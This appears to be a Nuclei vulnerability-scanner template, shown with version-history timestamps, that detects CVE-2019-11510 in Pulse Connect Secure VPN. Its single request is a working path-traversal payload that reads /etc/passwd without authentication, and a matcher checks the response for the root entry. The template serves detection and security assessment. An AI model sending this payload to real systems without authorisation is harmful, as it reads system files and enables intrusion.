nuclei-templates/cves/2019/CVE-2019-11510.yaml

29 lines
1000 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-11510
2020-04-22 06:42:01 +00:00
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: critical
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
2021-03-18 07:54:36 +00:00
tags: cve,cve2019,pulsesecure,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2019-11510
cwe-id: CWE-22
description: "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability ."
2020-05-25 07:49:06 +00:00
2020-04-22 06:42:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
2020-04-22 06:42:01 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-22 06:42:01 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-04-22 06:42:01 +00:00
part: body